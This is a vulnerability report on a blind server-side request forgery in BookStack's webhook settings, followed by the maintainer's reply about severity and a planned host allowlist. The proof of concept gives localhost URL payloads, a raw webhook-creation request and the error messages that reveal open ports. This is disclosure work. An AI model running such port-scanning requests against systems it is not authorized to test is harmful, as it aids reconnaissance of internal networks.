Server Side Request Forgery (SSRF) in bookstackapp/bookstack
Reported on
Jul 27th 2023
Description
It is possible to access the local environment in the Webhook function.
Therefore, Blind SSRF makes it possible to perform a port scan against the local environment.
Proof of Concept
After logging in, access the webhook setting page, specify the URL with the following pattern, and check that you can access the local environment from the message difference.
Payload
Open Port
http://localhost:80
Closed Port
http://localhost:1234
Request
POST /settings/webhooks/create HTTP/2
Host: demo.bookstackapp.com
...
_token=6AoIWKtSMXumoIqe2YyXsDREcraLVqwaIjf8VEV0&active=true&name=a&endpoint=http%3A%2F%2Flocalhost%3A1234%2F&timeout=20&events%5B%5D=all
Response Result (Error Message)
Open Port
Response status from endpoint was 405
Closed Port
cURL error 7: Failed to connect to localhost port 1234 after 0 ms: Connection refused (see https://curl.haxx.se/libcurl/c/libcurl-errors.html) for http://localhost:1234/
PoC Video
https://drive.google.com/file/d/1SM3HwCulnW_09L8FYo6V4wWc4tx95rYC/view?usp=drive_link
Impact
It is possible to perform a port scan against the host's local environment.
Also, sensitive information in the local environment may be obtained.
Thanks @scgajge12 for reporting. I updated the severity since this requires admin user access and user interaction to exploit.
I wouldn't want to reduce error messages or prevent local access in general, since the errors are meant to be actual and detailed, and there are legitimate local use-cases.
I'll probably instead add some level of SSR_HOST_ALLOWLIST option so a system admin can limit where all BookStack server-side-requests can be sent to.
This is pretty low-risk/low severity in my view so not something I'd rush a bug-fix for, but will more likely be something I target for the next feature releases (1-2 month release cycle).